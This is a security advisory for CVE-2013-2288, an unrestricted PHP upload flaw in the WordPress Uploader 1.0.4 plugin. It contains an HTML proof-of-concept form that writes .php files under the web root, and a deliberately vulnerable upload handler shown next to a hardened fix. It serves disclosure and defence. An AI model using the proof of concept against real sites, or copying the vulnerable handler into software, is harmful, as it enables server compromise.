Vulnerability Disclosure

Remote File Inclusion in Uploader version 1.0.4

Dognædis Ref.: DGS-SEC-17

CVE Ref: CVE-2013-2288

Release Date: 2013/03/01

Discovery Credits: CodeV - Code Analyzer

Bulletin Author(s): AMPP - CodeV Team


Type: Remote File Inclusion

Level: High (Low/High/Critical)

CVSS v2: 4 (AV:N/AC:L/Au:S/C:N/I:P/A:P)

Vulnerable Application: Uploader plugin for WordPress (1.0.4)

Uploader creates an Uploader role for file uploading.


File: /wp-content/plugins/uploader/uploadify/uploadify.php

Vulnerable Argument(s): $target_file

line 26: move_uploaded_file($temp_file, $target_file)

Proof(s) of Concept:
<form action="<app_root>/wp-content/plugins/uploader/uploadify/uploadify.php?folder=/wordpress/wp-content/uploads/&fileext=php" method="post" enctype="multipart/form-data">
<label for="Filedata">Filename:</label>
<input type="file" name="Filedata" id="Filedata"><br>
<input type="submit" name="submit" value="Submit">
</form>

The form must be submitted from a browser session authenticated as a user holding the Uploader role (Au:S in the vector above). The folder and fileext query parameters choose the destination directory and the extension of the stored file, so the selected file is written as a .php file under the web root.

Uploader is a WordPress plugin that allows users holding its Uploader role to upload files to the server.

An attacker who exploits this can place executable PHP in a web-accessible directory and thereby completely compromise the web server, constrained only by the permissions of the Apache (web server) user.

Suggested mitigation: verify the location of the files before moving them. Only files that PHP itself received through the HTTP upload (i.e. located in the upload temporary folder) should be moved to a permanent location, and the destination folder and file extension must not be taken from the request.
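The following is an added illustration, not the plugin's own code. It shows an Uploadify-style handler of the shape the PoC above implies (destination folder and extension trusted from the query string) next to a hardened rewrite that applies the mitigation just described. The function names, the nonce action name "uploader_upload" and the allowed-type list are assumptions made for the example; the WordPress API calls (current_user_can, check_ajax_referer, is_uploaded_file, wp_handle_upload) are real.

```php
<?php
// Added example, not code from the Uploader plugin. Function and parameter
// names are assumptions; the WordPress API calls are genuine.

// --- Vulnerable shape (do not deploy) ---------------------------------------
// Mirrors what the advisory's PoC implies: folder and fileext arrive in the
// URL and are used verbatim to build $target_file.
function vulnerable_upload_handler()
{
    if (empty($_FILES['Filedata'])) {
        return 'no file';
    }
    $temp_file = $_FILES['Filedata']['tmp_name'];
    $folder    = $_GET['folder'];    // attacker-chosen, e.g. /wordpress/wp-content/uploads/
    $fileext   = $_GET['fileext'];   // attacker-chosen, e.g. php
    $name      = pathinfo($_FILES['Filedata']['name'], PATHINFO_FILENAME);
    $target_file = $_SERVER['DOCUMENT_ROOT'] . $folder . $name . '.' . $fileext;

    // No capability check, no nonce, no extension allowlist, no is_uploaded_file():
    // this is the move the advisory flags.
    move_uploaded_file($temp_file, $target_file);
    return $target_file;
}

// --- Hardened version -------------------------------------------------------
function hardened_upload_handler()
{
    require_once ABSPATH . 'wp-admin/includes/file.php';   // wp_handle_upload()

    // 1. Authorisation and CSRF protection. Nonce action name is an assumption.
    if (!current_user_can('upload_files')) {
        wp_die('forbidden', '', array('response' => 403));
    }
    check_ajax_referer('uploader_upload', 'nonce');

    if (empty($_FILES['Filedata']) || $_FILES['Filedata']['error'] !== UPLOAD_ERR_OK) {
        wp_die('no file', '', array('response' => 400));
    }

    // 2. Only a file PHP received via this HTTP upload may be moved. This is
    //    the "temporary folder" check the advisory's mitigation asks for.
    if (!is_uploaded_file($_FILES['Filedata']['tmp_name'])) {
        wp_die('not an uploaded file', '', array('response' => 400));
    }

    // 3. Never take folder or extension from the request. wp_handle_upload()
    //    writes into wp_upload_dir(), picks a unique sanitised name, and
    //    rejects files whose extension or content is not in the allowed list.
    $overrides = array(
        'test_form' => false,              // no admin-post form field to check
        'mimes'     => array(              // assumed allowlist for this example
            'jpg|jpeg' => 'image/jpeg',
            'png'      => 'image/png',
            'gif'      => 'image/gif',
            'pdf'      => 'application/pdf',
        ),
    );
    $result = wp_handle_upload($_FILES['Filedata'], $overrides);
    if (isset($result['error'])) {
        wp_die(esc_html($result['error']), '', array('response' => 400));
    }
    return $result['file'];   // absolute path inside the WordPress uploads directory
}
```

The hardened handler fixes three independent problems: the missing capability and nonce checks, the caller-controlled destination path, and the caller-controlled extension. Even with these in place, a defence-in-depth step is to configure the web server so that PHP is never executed from the uploads directory, so that a future allowlist mistake does not again turn an upload into code execution.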

Official Solution:
At the time of publication there is no official fix for the reported vulnerability; the developer has not yet answered the first contact attempt.

External References:

Download the Vulnerability Report (PDF)

© Copyright 2015 CodeV